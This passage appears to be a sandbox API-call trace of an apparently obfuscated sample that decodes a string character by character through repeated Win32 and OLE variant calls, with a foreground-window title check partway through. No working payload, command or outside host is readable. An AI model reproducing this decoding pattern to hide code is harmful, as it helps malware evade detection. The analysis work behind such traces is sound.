pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.646] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.647] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.647] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.648] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.648] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.648] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.697] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.698] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.698] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.699] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.699] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.700] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.700] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.701] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.701] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.702] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.702] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.703] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.703] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.704] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.704] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.704] GetForegroundWindow () returned 0x2035c [0201.704] GetLastError () returned 0x0 [0201.704] SysStringLen (param_1=" ") returned 0xff [0201.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.705] SysStringLen (param_1=" ") returned 0xff [0201.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.705] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0201.705] GetLastError () returned 0x0 [0201.705] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.705] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0201.706] SysStringLen (param_1="Des") returned 0x3 [0201.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Des", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Des", lpUsedDefaultChar=0x0) returned 4 [0201.706] SetWindowTextA (hWnd=0x103c4, lpString="Des") returned 1 [0201.707] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0201.707] GetFocus () returned 0x0 [0201.707] lstrlenA (lpString="Des") returned 3 [0201.707] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0201.707] IsWindow (hWnd=0x103c4) returned 1 [0201.707] IsWindow (hWnd=0x103c4) returned 1 [0201.708] IsWindow (hWnd=0x103c4) returned 1 [0201.708] IsWindow (hWnd=0x103c4) returned 1 [0201.708] GetFocus () returned 0x0 [0201.708] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0201.709] GetFocus () returned 0x0 [0201.709] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0201.709] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0201.709] GetFocus () returned 0x0 [0201.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Des", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0201.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Des", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Des") returned 4 [0201.709] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.709] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0201.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.711] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0201.712] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.713] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0201.713] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.714] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0201.714] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.715] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0201.715] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.715] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0201.716] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.716] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0201.717] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.717] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0201.718] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.719] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.719] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.719] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.720] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.720] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.721] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.721] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.722] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.722] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.723] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.723] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.724] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.724] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.724] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.725] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.725] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.726] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.726] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.727] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.727] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.728] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.729] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.729] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.729] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.730] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.730] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.731] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.731] 